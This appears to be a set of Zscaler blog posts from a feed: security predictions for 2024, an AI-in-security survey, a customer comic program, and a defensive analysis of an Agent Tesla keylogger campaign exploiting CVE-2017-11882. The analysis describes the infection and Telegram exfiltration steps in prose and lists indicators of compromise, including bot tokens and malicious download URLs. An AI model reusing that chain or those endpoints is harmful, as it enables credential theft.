While CASB has been a staple of SaaS data protection for quite some time, a new kid on the block is getting popular: SaaS security posture management (SSPM). SSPM comes at the problem of cloud data protection from a different angle. Where CASB focuses on securing collaboration risks attached to data (like sharing data with open links), SSPM focuses on securing the cloud itself.
Shared responsibility models put the onus on your organization to ensure your SaaS apps have airtight configuration and integration posture. Since many of the largest breaches have stemmed from cloud misconfigurations, this is a growing concern. SSPM was built to address this very issue. Via API and a shadow IT catalog, SSPM scans your SaaS apps and platforms (e.g., Microsoft 365, Google) and reveals misconfigurations or integrations that put you at risk of a breach.
As SSPM begins to show up on radars worldwide, it’s important to not fall into point product land. Adding yet another point product to your environment is how many organizations end up with a frankenstein security stack. As such, security service edge (SSE) becomes a logical final resting place for this core technology.
Why? Complete SaaS security needs to be more than just controlling misconfigurations and integrations—you also need to think about SaaS identity (least-privileged access and permissions) and context visibility (who, what, where, and why). SSE excels in both these areas since it is becoming the de facto cloud security stack, which has all this information in spades.
Additionally, SSE was built with extensibility for new features in mind. Pairing SSPM with the CASB, DLP, and data protection aspects of SSE delivers a fantastic platform from which to launch your SaaS security efforts. You get a unified approach to all four areas you need for airtight, holistic SaaS security: secure identity, secure data, shadow IT governance, and cloud posture.
2. Managed or unmanaged device? Who cares!
In 2024, challenges with unmanaged (BYOD) endpoints used by your employees and partners will start to become a thing of the past. These cast-offs of the IT community have been a thorn in the side of security for some time since, to keep BYOD users productive, you still need to give them access to good stuff—like sensitive data.
Since you don’t own or manage BYOD endpoints, you don’t have control over that data once it lands on the device. With managed devices, you have lots of control levers to keep data secure. You can ensure patch level and device posture are up to snuff, or even remotely wipe the machine if need be. Not so much with BYOD.
With newer approaches like browser isolation, handling BYOD becomes a snap. Just throw those devices into an isolated browser before you send them off to access all that sensitive data. This way, the data remains in the isolated browser and never lands on the unmanaged device. Data is streamed to the device and appears on the screen, but you can’t cut, paste, print, or download it.
Look for vendors who can deliver this game-changing functionality without the need for a software agent, and with easy-to-configure BYOD portals that make getting app access as easy as logging in and clicking on the app of choice.
3. Secure the life cycle, not just the data
Another approach to posture that is gaining traction is data security posture management. While SSPM focuses on SaaS apps, DSPM focuses on the life cycle of your data to ensure it always has the right security posture. It’s about who, what, where, and why, much like SSPM in our first prediction. However, in this case, the hero of the story is your data.
Why are organizations focusing on this? Pick the most sensitive, crown-jewel piece of information in your organization. Naturally, you’d like to know where it is, where it moves to, who has access to it, if there are risky behaviors attached to it, and guidance on how to close those risks. In essence, you want to protect and follow that data anywhere. DSPM helps you do that, at scale, across all your sensitive data, with in-depth context to make the right protection decisions. The result is a consistent safe data posture that is inherently stronger and more airtight than before.
Much like SSPM, look for DSPM to become a core part of SSE. Paired with other key data protection technologies like DLP, CASB, and centralized policy control, DSPM will be an invaluable addition to data protection programs that need to up their game around control of sensitive data.
4. The lines between threat and data protection continue to blur
At 2023's Black Hat conference, it was astounding how many people wanted to talk about data protection. For a conference traditionally focused on stopping cyberattacks, this was profound, and it alluded to a shift happening across the industry. After all, it’s true what they say: it’s all about data.
Today’s cyberthreats are as much about stealing data as hurting company productivity. Adversaries have realized data is a gold mine, and they will continue to exploit it. So, as security architects think about building out defenses against today’s threats, data protection will become an integral part of the equation.
As we blast through 2024, watch out for new data protection offerings that give you more choices on the surface—but that also risk a fragmented approach. The moral of the story is keep your eye on the prize. There’s a reason data protection is part of SSE, one of the fastest-growing security architectures in the last decade. When data protection is centralized in a high-performance inspection cloud with a single agent, things become super streamlined and unified across all channels you need for great protection.
Remember that DLP is the core building block of data protection. With a centralized DLP engine, all data across endpoint, network, and at rest in clouds triggers the same way. This leads to a single point of truth for protection, investigations, and incident management, which is what every IT team wants.
5. Every prediction blog will have something about GenAI
Our other predictions will have varying hit rates, but this one is 100% guaranteed. No 2024 prediction blog will be complete without GenAI. It’s going to revolutionize the world right before it destroys it, right? Like all new technology crazes, there will be an equilibrium process. Sure, GenAI will enable us to move faster and smarter, but there will be a learning curve around what it does well, and what it doesn’t. Companies will try to integrate it across their business stack to varying degrees of success.
But one thing is for sure: data will be headed to GenAI at an alarming rate, so data protection will need to focus on controlling what data goes into GenAI while leveraging GenAI’s power to find risks faster. (I realize I just said, in essence, “using GenAI to catch GenAI leaking data to GenAI,” so apologies for that.)
Basically, GenAI is just another productivity tool we need to protect against misuse. Treat GenAI like a shadow IT app. To control it, you need a platform that delivers complete visibility and the proper levers to enable it safely within your organization while ensuring sensitive data doesn’t leak to it.
The other half of this is using GenAI to make security smarter. AI will continue to find its way into the ubiquity of computing. We will take for granted its power to help us deliver more powerful correlation, context, analysis, and response times. That’s the relentless pursuit of better security, which is what we’re all about.
But let's avoid calling anything in the future “NexGenAI,” because as a marketer, that’s just not cool, man.
Putting it all together
If you’ve made it this far, you’ve probably picked up on a few themes. Great data protection requires context, integration, posture, and a platform to bring it all together. There’s no telling how far security service edge will take us, but it’s set up for a great year as its architecture expertly enables new features, improves on existing ones, and delivers all-around unified, high-performance data protection.
If you’re looking to up your data security game in 2024, we’ve got you covered. Jump on over to read about the Zscaler Data Protection platform or get in touch with us to book a demo.
Interested in reading more about Zscaler's predictions in 2024? Read our previous blog in the series about cyber predictions.
Forward-Looking Statements
This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024.
Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at ir.zscaler.com and on the SEC's website at www.sec.gov. Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law.
Thu, 04 1月 2024 08:00:01 -0800Steve Grossenbacherhttps://www.zscaler.jp/blogs/product-insights/data-protection-predictions-2024AI: Boon or Bane to Security?
https://www.zscaler.jp/blogs/product-insights/ai-boon-or-bane-security
Security professionals believe offensive AI will outpace defensive AI
A recent Cybersecurity Insiders report found that AI is transforming security—making fundamental (and likely permanent) changes to both the attacker and defender toolkits.
The “Artificial Intelligence in Cybersecurity” report surveyed 457 cybersecurity professionals online and also tapped into Cybersecurity Insiders’ community of 600,000 information security professionals to find out what CISOs and their frontline teams think about AI’s impact on cybersecurity.
The report reveals some sobering findings on what security professionals most fear about AI in the hands of malicious actors. According to the report, 62% of security professionals believe offensive AI will outpace defensive AI.
Here’s a breakdown of the report and Zscaler’s take on what to do to combat AI-driven cyberattacks.
Source: 2023 Artificial Intelligence in Cybersecurity Report, Cybersecurity Insiders
AI increases the sophistication of cyberattacks
Unsurprisingly, 71% of respondents believe AI will make cyberattacks significantly more sophisticated, and 66% think these attacks will be more difficult to detect.
Source: 2023 Artificial Intelligence in Cybersecurity Report by Cybersecurity Insiders
These findings align with observations by the Zscaler ThreatLabz security research team. For instance, the 2023 ThreatLabz Phishing Report noted that AI tools have significantly contributed to the growth of phishing, reducing criminals’ technical barriers to entry while saving them time and resources. Concerningly, the use of AI in phishing campaigns is projected to grow in the coming years.
Bracing for AI-enabled ransomware and cyber extortion attacks should be top-of-mind for security practitioners. Think about it: ransomware attacks typically start with social engineering, which 53% of respondents believe will grow more dangerous because of AI. For instance, attackers can use AI voice cloning to impersonate employees to gain privileged access, or use generative AI to help craft convincing phishing emails. Moreover, it will also get easier for attackers to discover and identify zero-day vulnerabilities.
Also, the business model of encryption-less extortion—in which threat actors steal data and demand a ransom to avoid a leak, rather than encrypting files—will benefit from advancements in AI-enabled tools that can drastically speed up the development of malicious code, exacerbating the threat to both public and private organizations
Organizations plan to increase AI usage in security
Zscaler strongly recommends that security practitioners prepare for more coordinated and effective attacks on larger groups of people, as threat actors will leverage AI to launch more sophisticated scams across different communication channels, such as email, SMS, and websites.
As the Cybersecurity Insiders survey found, security teams plan to invest more in defensive AI capabilities to do just that.
Source: 2023 Artificial Intelligence in Cybersecurity Report by Cybersecurity Insiders
In another notable finding, 48% of respondents believe the use of deep learning for detecting malware in encrypted traffic holds the most promise for enhancing cyber defenses. At Zscaler, we have always advocated for inspecting most (if not all) TLS/SSL traffic and applying layered inline security controls. Today, at least 95% of traffic is encrypted (Google Transparency Report), and the Zscaler ThreatLabz 2023 State of Encrypted Attacks report shows that 85.9% of threats are now delivered over encrypted channels, underscoring the need for thorough inspection of all traffic.
The Zscaler Zero Trust Exchange inspects HTTPS at scale using a multilayered approach with inline threat inspection, sandboxing, data loss prevention, and a wide array of additional defense capabilities. On top of all that, the AI-powered Zscaler cloud effect means that all threats identified across the global platform trigger automatic updates to protect all Zscaler customers.
Strategies for combating AI-powered adversaries
Technology has always been a double-edged sword. The age of AI has arrived, and it is just beginning. Accordingly, organizations should prioritize the adoption of AI for cyberthreat protection—so it is gratifying that 74% of respondents say AI is a “medium” to “top” priority for their organization.
Additionally, partnering with security vendors who offer superior AI capabilities is crucial. This is easier said than done, as most vendors now claim to leverage AI. The best way forward is to educate yourself, look to vendors with a proven record of technological innovation, and engage them in proofs of concept to assess the efficacy of their solutions for yourself.
To find out more about why you need an AI-powered zero trust security platform such as Zscaler’s, watch this on-demand webinar. To read the full “Artificial Intelligence in Cybersecurity'' report by Cybersecurity Insiders, get your complimentary copy here.
Mon, 08 1月 2024 08:00:01 -0800Apoorva Ravikrishnanhttps://www.zscaler.jp/blogs/product-insights/ai-boon-or-bane-securityTop 5 Cyber Predictions for 2024: A CISO Perspective
https://www.zscaler.jp/blogs/security-research/top-5-cyber-predictions-2024-ciso-perspective
Amidst the ever-evolving realm of enterprise security, a new year unfolds, introducing a dynamic array of emerging threats. While the “prediction season” gains momentum, it's pivotal to reflect on the high impact of the 2023 cybersecurity landscape. This past year set a profound stage, from the advent of stringent cyber regulations to the convergence of generative AI, social engineering, and ransomware.
Let's delve into the rewind of 2023, exploring five influential trends and threats that molded the cyberthreat landscape and are poised to resonate throughout enterprises in 2024.
2023 Rewind — Cyber Trends and Threats
The generative AI (r)evolution
2023 will be remembered as the year artificial intelligence (AI) rose to the forefront of our collective consciousness, ushering in never before seen opportunities and risks. The release of generative AI-powered applications like ChatGPT highlights the potential for AI and machine learning (ML) to reshape how organizations operate. In September, the Zscaler ThreatLabz team conducted an analysis of AI/ML and ChatGPT trends amongst enterprises stretching back across 2023 and, unsurprisingly, discovered upward trajectories in AI/ML traffic and usage.
This adoption brings us to the flip side of the generative AI coin: attackers are leveraging AI tools to elevate and automate phishing campaigns, craft extremely evasive malware, and reduce the development time of threats across the board. Security leaders and enterprises find themselves at a new crossroads, tasked with delicately navigating the interplay of securely leveraging AI’s evolutionary advancements while confronting the unforeseen revolutionary challenges of safeguarding against AI-powered threats.
Rampant ransomware — again
The pervasive impact of ransomware resonated widely in 2023. ThreatLabz research revealed a 37% surge in ransomware attacks, accompanied by an average enterprise ransom demand of $5.3 million and an average payment exceeding $100,000. 2023 also saw the rise of Ransomware-as-a-Service (RaaS), a business model in which ransomware authors or gangs sell or lease their services on the dark web. The ransomware family BlackCat group, or ALPHV, emerged as a significant contributor to this unsettling trend, linking back to multiple high-profile attacks against casinos.
Ransomware gangs also got stealthier in 2023, with ThreatLabz observing an increase in encryption-less extortion attacks. The absence of encryption allows attackers to eliminate development cycles and decryption support and quietly exfiltrate data before making ransom demands.
Clop ransomware’s zero day attack on the file transfer tool MOVEit was the largest data theft of 2023, impacting 83 million individuals and nearly 3,000 organizations. This hack served as a stark reminder that the supply chain remains a critical vulnerability in enterprise security.
More sophisticated social engineering
Social engineering attacks were adept at exploiting human vulnerability before—now, with AI part of the equation, these attacks are more of a threat than ever. While AI enhanced the sophistication and effectiveness of common social engineering tactics like phishing and smishing scams, there was a notable shift towards vishing (voice phishing) attacks in 2023. The use of voice communications to deceive victims was particularly effective for the BlackCat affiliate ScatteredSpider—and damaging for the gaming industry. Last year, we witnessed the fast-evolving nature of social engineering attacks, and this evolution poses greater challenges for detection and defense.
The fall of VPNs and firewalls
The cyberthreats and trends of 2023 send a clear message to organizations: they must evolve their security strategies to the times and embrace a zero trust architecture. Legacy, perimeter-based architectures like traditional virtual private networks (VPNs) and firewalls are not only expanding the attack surface, but also exacerbating challenges for organizations that are up against increasingly sophisticated threats and cloud-first demands.
In fact, 2023 saw an increase in VPN vulnerabilities and, accordingly, nearly 1 in 2 organizations reported that they experienced VPN-related attacks.
With 92% of those organizations considering, planning, or in the midst of a zero trust implementation, it’s an encouraging sign that zero trust grew as a priority in 2023.
Enterprise tools under attack
2023 saw threat actors, groups, and families pivot to targeting providers of core enterprise tools. These incidents highlight the increasing vulnerability of the broader digital supply chain and the interconnected nature of enterprise tools that are crucial to daily business operations. Whether driven by financial motives, the theft of valuable credentials, or even geopolitical interests in the case of nation-state attacks, the focus on these tools emphasizes the need for organizations to extend their cybersecurity protocol beyond their organizational walls. The solution? A more mature third party risk management program.
2024 Predictions — AI, RaaS, MiTM (and more)
Many of the past year's most impactful trends and threats will persist, evolve, and shape the enterprise security landscape in the year ahead. Let’s explore five predictions that should be top of mind for security leaders and organizations.
Prediction 1: Generative AI-Driven Attacks
Generative AI-driven reconnaissance, exploitation, and phishing attacks will grow in volume. There is good reason for AI to be at the top of security experts’ predictions list again this year. GenAI and large language mode (LLM) tools will be the great enablers of 2024, continuing to lower the barrier to entry for threat actors. AI empowers threat actors to automate diverse tasks at scale, from identifying exposed assets like firewalls, VPNs, and VDIs to effortlessly compiling lists of known vulnerabilities or crafting sophisticated phishing emails.
This level of scalability afforded by AI automation will undoubtedly continue to enhance the efficiency and reach of malicious activities this year. Reports of malicious versions of ChatGPT, like WormGPT, circulating on the dark web in 2023 signify two concerning trends: the potential for development of new malicious LLMs without any built-in ethical restraints, and the emergence of their use in threat campaigns. From suggesting attack ideas to automating development and execution processes, these AI tools have the potential to catapult cyberthreat evolution years into the future in mere months.
What’s more, 2024 is an election year in the United States, and it is a strategic imperative as such to ensure the resilience of critical infrastructure against AI-powered misinformation and other elusive attacks.
Organizations of every type will have to be more vigilant and take proactive security measures, from refreshed employee security training tailored to social engineering and AI-specific threats to holding vendors accountable for delivering AI-powered cybersecurity. We must fight fire with fire and use generative AI, machine learning, and deep learning techniques to protect data, devices, and networks against AI-powered threats.
Prediction 2: Ransomware-as-a-Service Innovation
Ransomware-as-a-Service will innovate and assist in the volume of successful attacks. The RaaS model is poised to further elevate cybercrime and empower less-skilled crime groups in 2024. In addition, we should anticipate a new wave and an increasing prevalence of initial access brokers, similar to Scattered Spider, that specialize in facilitating unauthorized access to target networks. Encryption-less attacks will continue to be a popular strategic tactic used by ransomware operators to evade detection, putting the onus on organizations to focus on detecting anomalous activity beyond the typical patterns associated with encryption-based ransomware.
In navigating these evolving ransomware threats and trends, organizations must prioritize comprehensive zero trust protection strategies for every stage of the attack chain, from initial compromise to execution.
Prediction 3: Rise in Man-in-the-Middle Attacks
Failure to implement a zero trust architecture will result in an increase in man-in-the-middle (MiTM) attacks. MiTM threats will remain a significant concern for enterprises in 2024, exacerbated by Phishing-as-a-Service toolkits that democratize sophisticated MiTM attacks, making them accessible to a broader range of threat actors. This tactic targets users of a specific server or system and captures data in transit, such as user authentication credentials or cookies, by mimicking online services through proxy servers.
The risks associated with MiTM phishing attacks—unauthorized access, data theft, and compromise of critical information—call for zero trust and advanced security measures. Without a proxy-based zero trust architecture, full TLS inspection, and FIDO2 multifactor authentication (MFA), organizations remain exposed to vulnerabilities in communication channels and user authentication. As such, it is imperative to prioritize these security measures in 2024.
Prediction 4: Supply Chain Attacks on Generative AI Ecosystems & Development Environments
Supply chain attacks will target vulnerable generative AI ecosystems. As supply chains become more interconnected and attacks more sophisticated in 2024, both upstream and downstream components of supply chains will be increasingly at risk.
Namely, attackers will leverage new ways to strategically exploit weaknesses in various components beyond traditional attack vectors. As organizations integrate more AI components to their supply chains, LLMs and AI will increasingly be part of supply chain security conversations. If not adequately secured, an AI-powered supply chain can become a target for attackers seeking to poison AI training data, manipulate updates, inject malicious algorithms, engage in prompt engineering, or exploit vulnerabilities as an entry point to compromise organizations' data or systems.
Organizations must recognize the critical role of a resilient supply chain in ensuring business continuity and overall resilience and prioritize investments to safeguard against the far-reaching consequences of supply chain compromise. Eliminating the internet-facing attack surface will be critical, and implementing zero trust security controls to stop lateral movement and block command-and-control activities will be instrumental in doing so. In short, enterprises must adopt a comprehensive approach to safeguard not only their internal AI applications but those of their suppliers, as well.
Prediction 5: Attackers Respond to SEC Regulations
Attacks will shift in response to the cyber regulations imposed by the U.S. Securities and Exchange Commission (SEC). Anticipating the impact of the new SEC regulations mandating disclosure of material breaches, it's likely that attackers will further hone their already adept stealth methods. Expect a heightened focus on covert strategies, leveraging sophisticated evasion techniques and encryption to prolong undetected access. Additionally, attackers may target non-material systems more frequently to navigate under the radar, gather intelligence, and discreetly escalate privileges. With an eye on evading immediate disclosure obligations, we could see a surge in third-party and supply chain vulnerability exploitation. In essence, the future threat landscape may dictate a predictive shift toward even more strategic and discreet approaches as attackers adapt to emerging regulatory frameworks.
The SEC cyber regulations will also drive strategic shifts in security teams. The mandates for timely reporting of material incidents and annual reporting on cyber risk management will be a catalyst for more cross-functional collaboration in 2024. How will organizations prepare and comply with the reporting process? Do they have sufficient defense in depth and security governance? These questions—and their legal implications—will be a forcing function for cyber and corporate alignment. For many companies, this means that CISOs and security leaders will work closer than ever with CEOs, legal teams, and boards to develop processes for disclosure and strengthen their organization’s security posture.
As the new year unfolds, security teams will have their work cut out for them. By prioritizing investments in a zero trust architecture, AI-based security controls, employee training, and strategic planning, you can build resilience and better protect against evolving threats. The Zscaler Zero Trust Exchange counters advanced attacks through TLS/SSL inspection, browser isolation, and policy-driven access controls, stops lateral movement with direct user-to-app connections, and prevents data loss with thorough inspection. Request a customized demo on how Zscaler can help address your organization’s security needs.
Follow Zscaler ThreatLabz on X (Twitter) and our Security Research Blog to stay on top of the latest cyberthreats and security research. The Zscaler ThreatLabz threat research team continuously monitors threat intelligence from the world’s largest inline security cloud and shares its findings with the wider security community.
Forward-Looking Statements
This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024.
Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at ir.zscaler.com and on the SEC's website at www.sec.gov. Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law.
Tue, 02 1月 2024 08:00:01 -0800Deepen Desaihttps://www.zscaler.jp/blogs/security-research/top-5-cyber-predictions-2024-ciso-perspectiveImmortalizing the Heroic Journeys of Zscaler Customer Advocates
https://www.zscaler.jp/blogs/customer-stories/immortalizing-heroic-journeys-zscaler-customer-advocates
Look! Up in the sky! Is it a bird? Is it a plane?
It’s our Zscaler IT Heroes—a series of colorful illustrated stories celebrating our customers as the “heroes” of their organizations’ digital transformation. An initiative of our Customer Advocacy program, these comic strip-style illustrations tell a story about each customer’s zero trust security journey in just three frames. Shared via Zscaler’s social media channels, each comic links to its respective case study that captures the organization’s evolution to the cloud, powered by Zscaler.
Written case studies are a standard element of many marketing programs, but I saw an opportunity to try something new by creating a uniquely rewarding experience for our customers.
We wanted to breathe life into our existing case studies with a fun and unique way to honor our customers, and offer their peers potential solutions, while showcasing their successes. These comics bring the customers’ voices to life, giving them the much deserved spotlight and demonstrating one of our core company values: customer obsession.
In addition to the thrill of seeing their illustrative narratives spread like wildfire across social media, each customer receives a digital file of their comic strip and physical framed version for their desks. This reinvents the traditional lucite desk award that people typically receive with a more meaningful recognition. Who could resist being the star in their own comic? Talk about a great conversation starter with your cube mate! Even better, recipients have told me that their kids are beyond impressed with the award—and we all know kids are the biggest critics of all.
"To make customer advocacy as effective as possible, we need a multi-pronged approach, from detailed success stories and engaging videos, to eye-catching creative campaigns like Zscaler’s IT Heroes series,” my manager Pavel Radda, VP, Global Communications, shared with me. “These vividly illustrated stories weave together the threads of imagination and zero trust innovation, capturing the essence of each customers’ secure digital transformation journey."
A Journey Well Traveled
Like many new ideas, the IT Heroes journey had many stops and starts from inception to finished product. It was such a unique concept, I had to make sure everyone was inspired enough by the vision to take a leap of faith and believe it would succeed. I thought through the plan and discussed it with various internal stakeholders to gauge their reaction– a litmus test, if you will. I also connected with our customer champions to get their perspectives on the award. Customers not only loved the comic strip idea, many shared that they would be honored to be recognized in this way.
Taking the time to involve the right people and bring in the right subject matter experts who made tweaks along the way made the final product so much better. It changed the trajectory and outcome entirely. By partnering with my brilliant peers at Zscaler, we created something really special.
The Gift That Keeps On Giving
Once the initial IT Heroes program launched, the team and I were pleasantly surprised by the response.
“The IT Hero comics are some of the most creative pieces of social content we produce, easily in the top three for total engagement over the past six months,” said Jeff Anaya, Sr. Social Media Manager, Zscaler. “It's great, it's interesting, and it works.”
“Such an awesome project! I actually had someone randomly reach out on LinkedIn (before I shared it) saying how cool it is,” said Kristi Myllenbeck, Copywriter, Zscaler.
Customers who were featured in the IT Heroes series not only felt the love, but shared it back:
“Thanks for this. We are indeed honored to have been selected as a recipient of this new award and to be recognised as a leading customer advocate.” – John Armenakas, Director, Partner Development & Success, Colt Technology Services
“It has been great to work with you and the team and it is an honor to receive the award.” – Peeyush Patel, CISO, Careem
“What a nice surprise! I have seen the post and the attention it already got. Thanks again.” – Armin Auth, Head of Enterprise Architecture, Hydro
From Comic Strip to Comic Series
One year and 12 comics later, the team is taking it up a notch by launching the new “Z Cloud Collective,” a digital comic book that encompasses all the customer IT Heroes triumphs to date, with many more to come. This project is the first of its kind on Zscaler.com, and I hope it opens the door for many more interactive elements across the web in the future.
Calling All IT Heroes
We are looking forward to recognizing so many more customer advocates in the future. If you've harnessed the power of the Zscaler Zero Trust Exchange platform to accelerate your organization’s zero trust journey, or you know someone else who has, submit your nomination today!
Thu, 21 12月 2023 10:02:17 -0800Josselyn Grahamhttps://www.zscaler.jp/blogs/customer-stories/immortalizing-heroic-journeys-zscaler-customer-advocatesThreat Actors Exploit CVE-2017-11882 To Deliver Agent Tesla
https://www.zscaler.jp/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
Introduction
First discovered in 2014, Agent Tesla is an advanced keylogger with features like clipboard logging, screen keylogging, screen capturing, and extracting stored passwords from different web browsers. Recently, Zscaler ThreatLabz detected a threat campaign where threat actors leverage CVE-2017-11882 XLAM to spread Agent Tesla to users on vulnerable versions of Microsoft Office. The CVE-2017-11882 vulnerability is a remote code execution flaw found in the Equation Editor of Microsoft Office. It arises due to a weakness in how the software manages system memory for objects.
In this blog, we examine the tactics employed by threat actors to deploy Agent Tesla malware using CVE-2017-11882. We shed light on the methods used for data theft and evasion strategies like obfuscation and anti-debugging techniques.
Key Takeaways
Threat actors strategically utilize words like “orders” and “invoices” in spam emails to encourage users to download malicious attachments containing CVE-2017-11882.
Threat actors include a VBS file in their infection chain to add a layer of complexity to analysis and deobfuscation attempts.
Threat actors use the RegAsm.exe file to carry out malicious activities under the guise of a genuine operation.
Microsoft Excel Infection Sequence
Threat actors begin the infection sequence by distributing spam emails with malicious attachments (like in Figure 1 and Figure 2 below) in hopes that users on vulnerable versions of Microsoft Excel open these emails and download the attachments.
Figure 1: Spam email example
Figure 2: Spam email example
To make these spam emails seem legitimate, threat actors use words like “invoices” and “order” in the emails. This strategy lends authenticity to fraudulent emails and encourages users to download attachments.
Once a user downloads a malicious attachment and opens it, if their version of Microsoft Excel is vulnerable, the Excel file initiates communication with a malicious destination and proceeds to download additional files without requiring any further user interaction. Figure 3, shown below, depicts how the first additional file downloaded is a heavily obfuscated VBS file.
Figure 3: Malicious communication and additional file download
Figure 4 shows the actual obfuscated VBS file.
Figure 4: Obfuscated VBS file
The VBS file incorporates variable names that are 100 characters long, adding a layer of complexity to the analysis and deobfuscation. The VBS file initiates the download of a malicious JPG file, as in Figure 5 below.
Figure 5: Malicious JPG file (steganography image)
The JPG file contains a Base64-encoded DLL, as shown in Figure 6.
Figure 6: Base64-encoded DLL inside an image
Threat actors inject a Base64-encoded DLL into an image to evade detection from antivirus programs. Once the JPG file downloads, the VBS file executes a PowerShell executable that retrieves the Base64-encoded DLL from the image file, decodes the DLL, and loads the malicious procedures from the decoded DLL. For accurate file retrieval, the threat actors utilize <<BASE64_START>> and <<BASE64_END>> tags. Figure 7, shown below, illustrates the command.
Figure 7: Malicious command that loads and runs the DLL file
After the PowerShell executes, it executes the RegAsm.exe file, as shown in Figure 8 below. While the primary function of RegAsm is typically associated with registry read-write operations, in this context, its purpose is to carry out malicious activities under the guise of a genuine operation.
Figure 8: Process tree and thread injection in RegAsm.exe
From here, the DLL fetches the Agent Tesla payload and injects a thread into the RegAsm process, as shown in Figure 9 below.
Figure 9: Thread injected into RegAsm.exe
Figure 10, shown below, depicts instances where Agent Tesla attempts to steal data from various browsers to send to a malicious destination controlled by threat actors.
Figure 10: Browser data theft
In addition to browser data, Agent Tesla targets credentials from both mail clients and FTP applications, as shown in Figure 11.
Figure 11: Agent Tesla steals data from Outlook
As shown below in Figure 12, Agent Tesla attempts to deploy keyboard and clipboard hooks to monitor all keystrokes and capture data copied by the user.
Figure 12: Keyboard and clipboard hooks
In Figure 13 below, Agent Tesla uses window hooking, a technique utilized to monitor event messages, mouse events, and keystrokes. When a user acts, the threat actor's function intercepts before the action occurs.
Figure 13: Window hooking
From here, the malware sends the exfiltrated data to a Telegram bot controlled by the threat actor, as shown in Figure 14 below.
Figure 14: Exfiltrate to Telegram
Conclusion
Our blog provided an overview of the tactics employed by threat actors exploiting CVE-2017-11882 to deliver Agent Tesla, from their methods of data theft to evasion strategies, like obfuscation and anti-debugging techniques. Our analysis highlights how threat actors constantly adapt infection methods, making it imperative for organizations to stay updated on evolving cyber threats to safeguard their digital landscape.
In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the cybersecurity community.
Zscaler Coverage
Win32.Backdoor.Agenttesla.LZ
XLS.Exploit.CVE-2017-11882
DOC.Exploit.CVE-2017-11882
Indicators of Compromise (IOCs)
Telegram URLs used for exfiltration
api.telegram[.]org/bot6362373796:AAFAjB2uG5ePhAcUiHforF23Ij_H_LDLFUs
api.telegram[.]org/bot6475150763:AAFSaMWIpAeiCNQFdS0vxz0W6HCxWx96MFk/sendDocument
api.telegram[.]org/bot6663697988:AAHBsfmbPr_JinYR7jDRpZloxUBi6EcQ6HE/sendDocument
Malicious URLs
79.110.48[.]52/nicko.vbs
79.110.48[.]52/nix.txt
193.42.33.51/knog.txt
Malicious Excel files
201CD0A2FC6A87D25D6AED1E975FAE71 (CVE-2017-11882)
38f6b4d5804de785b925eb46ddd86d6f (CVE-2017-11882)
C1521547DEA051BD7A007516511FB2CA (CVE-2017-11882)
dddabc8019a7184055301927239a9438 (CVE-2017-11882)
Malicious VBS files
F302ADDF3B4068888788D8EDCE8F52A0
1402E4408F123DA1E9BC3BDE078764FC
A1C2B285A7FF9DD99C70E4D750EFEA51
Malicious JPG files
8496654930be3db6cea0ba62ffe5add9
d6f8c9a88cbdd876695f4bef56972f2e
8d17b59e8bb573b12a9d0e42746f8aef
Malicious DLL files
8955B482E59894864BACE732302A9927
F5F51251DC672E1934746E0057011B1A
5630282A95AFD2A5CEEECC5ACF7FF053
Malicious executables
547b88c4aa225377d7d65e912d81fe28
87aa9fc1bf49d48234160a15515a8145
0ada110f82ce64fcfab0eb0e5d8d948e
32e9af7d07a5edcc9bf9b5c8121acc55
b551da554933c2c064f96aaa6aa9ff55
7ea06a0e6c1e5707a23364ae6984b4f3
f3f27883dc91a7c85a03342bf6fed475
7c9ad2b73748f8c745d5d49b9b4876c5
a8c8010963f35fc3253d6409c169a9f2
d6a1feb6cfa307c5031ea2dd2118d786
069bb6a37f9312ba4fea6c70b7134d39
6bdb7a11d0eaa407e7a7f34d794fb567
f11d72bc4192b2ed698cc2b0200773bf
a55302ad4bf2f050513528a2ca64ff01
01b02fc9db22a60e8df6530a2e36a73b
43ec3cc0836bd759260e8cf120b79a7b
5477e3714c953df2bb3addf3bebbda9a
be1858db74162408c29c8b8484b3cf88
38bb6b06907c6e3445aa23c8d229e542
05bc545b9b0de1ccb4254b59961ea07b
25a697d0e6c5fa06eea8ba0d3ae539da
